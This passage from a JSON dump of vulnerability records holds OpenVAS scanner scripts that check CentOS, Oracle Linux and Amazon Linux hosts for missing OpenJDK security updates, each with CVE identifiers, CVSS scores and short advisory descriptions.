rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.1.0.1.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.1.0.1.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.1.0.1.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.1.0.1.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.1.0.1.el6_3\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-21T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0165 centos6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881564", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881564", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0165 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-January/019204.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881564\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-21 09:39:47 +0530 (Mon, 21 Jan 2013)\");\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0165\");\n script_name(\"CentOS Update for java CESA-2013:0165 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"java on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"These packages provide the OpenJDK 7 Java Runtime Environment and the\n OpenJDK 7 Software Development Kit.\n\n Two improper permission check issues were discovered in the reflection API\n in OpenJDK. An untrusted Java application or applet could use these flaws\n to bypass Java sandbox restrictions. (CVE-2012-3174, CVE-2013-0422)\n\n This erratum also upgrades the OpenJDK package to IcedTea7 2.3.4. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.7.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.4.1.el6_3\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:51:54", "description": "Check for the Version of java", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0604 centos5 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:881621", "href": "http://plugins.openvas.org/nasl.php?oid=881621", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:0604 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"These packages provide the OpenJDK 6 Java Runtime Environment and the\n OpenJDK 6 Software Development Kit.\n\n An integer overflow flaw was found in the way the 2D component handled\n certain sample model instances. A specially-crafted sample model instance\n could cause Java Virtual Machine memory corruption and, possibly, lead to\n arbitrary code execution with virtual machine privileges. (CVE-2013-0809)\n\n It was discovered that the 2D component did not properly reject certain\n malformed images. Specially-crafted raster parameters could cause Java\n Virtual Machine memory corruption and, possibly, lead to arbitrary code\n execution with virtual machine privileges. (CVE-2013-1493)\n\n This erratum also upgrades the OpenJDK package to IcedTea6 1.11.9. Refer to\n the NEWS file, linked to in the References, for further information.\n\n All users of java-1.6.0-openjdk are advised to upgrade to these updated\n packages, which resolve these issues. All running instances of OpenJDK Java\n must be restarted for the update to take effect.\";\n\n\ntag_affected = \"java on CentOS 5\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019267.html\");\n script_id(881621);\n script_version(\"$Revision: 6655 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:48:58 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:19:44 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0604\");\n script_name(\"CentOS Update for java CESA-2013:0604 centos5 \");\n\n script_summary(\"Check for the Version of java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.36.1.11.9.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-17T23:01:41", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2013-167)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120386", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120386", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120386\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:25:10 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2013-167)\");\n script_tag(name:\"insight\", value:\"An integer overflow flaw was found in the way the 2D component handled certain sample model instances. A specially-crafted sample model instance could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with virtual machine privileges. (CVE-2013-0809 )It was discovered that the 2D component did not properly reject certain malformed images. Specially-crafted raster parameters could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with virtual machine privileges. (CVE-2013-1493 )\");\n script_tag(name:\"solution\", value:\"Run yum update java-1.6.0-openjdk to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2013-167.html\");\n script_cve_id(\"CVE-2013-1493\", \"CVE-2013-0809\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~57.1.11.9.52.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~57.1.11.9.52.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-debuginfo\", rpm:\"java-1.6.0-openjdk-debuginfo~1.6.0.0~57.1.11.9.52.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~57.1.11.9.52.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~57.1.11.9.52.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~57.1.11.9.52.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:04", "description": "Oracle Linux Local Security Checks ELSA-2013-0603", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0603", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123677", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123677", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0603.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123677\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:07:07 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0603\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0603 - java-1.7.0-openjdk security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0603\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0603.html\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.8.0.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.8.0.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.8.0.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-17T23:01:50", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2013-168)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120385", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120385", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120385\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:25:09 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2013-168)\");\n script_tag(name:\"insight\", value:\"An integer overflow flaw was found in the way the 2D component handled certain sample model instances. A specially-crafted sample model instance could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with virtual machine privileges. (CVE-2013-0809 )It was discovered that the 2D component did not properly reject certain malformed images. Specially-crafted raster parameters could cause Java Virtual Machine memory corruption and, possibly, lead to arbitrary code execution with virtual machine privileges. (CVE-2013-1493 )\");\n script_tag(name:\"solution\", value:\"Run yum update java-1.7.0-openjdk to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2013-168.html\");\n script_cve_id(\"CVE-2013-1493\", \"CVE-2013-0809\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk-demo\", rpm:\"java-1.7.0-openjdk-demo~1.7.0.9~2.3.8.0.22.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk\", rpm:\"java-1.7.0-openjdk~1.7.0.9~2.3.8.0.22.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk-devel\", rpm:\"java-1.7.0-openjdk-devel~1.7.0.9~2.3.8.0.22.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk-src\", rpm:\"java-1.7.0-openjdk-src~1.7.0.9~2.3.8.0.22.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk-debuginfo\", rpm:\"java-1.7.0-openjdk-debuginfo~1.7.0.9~2.3.8.0.22.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.7.0-openjdk-javadoc\", rpm:\"java-1.7.0-openjdk-javadoc~1.7.0.9~2.3.8.0.22.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:02", "description": "Oracle Linux Local Security Checks ELSA-2013-0604", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0604", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-0809", "CVE-2013-1493"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123676", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123676", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0604.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123676\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:07:06 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0604\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0604 - java-1.6.0-openjdk security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0604\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0604.html\");\n script_cve_id(\"CVE-2013-0809\", \"CVE-2013-1493\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.36.1.11.9.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.36.1.11.9.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.36.1.11.9.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.36.1.11.9.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.36.1.11.9.0.1.el5_9\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-26T11:09:52", "description": "Check for the Version of java", "cvss3": {}, "published": "2013-03-12T00:00:00", "type": "openvas", "title": "CentOS Update for java CESA-2013:0602 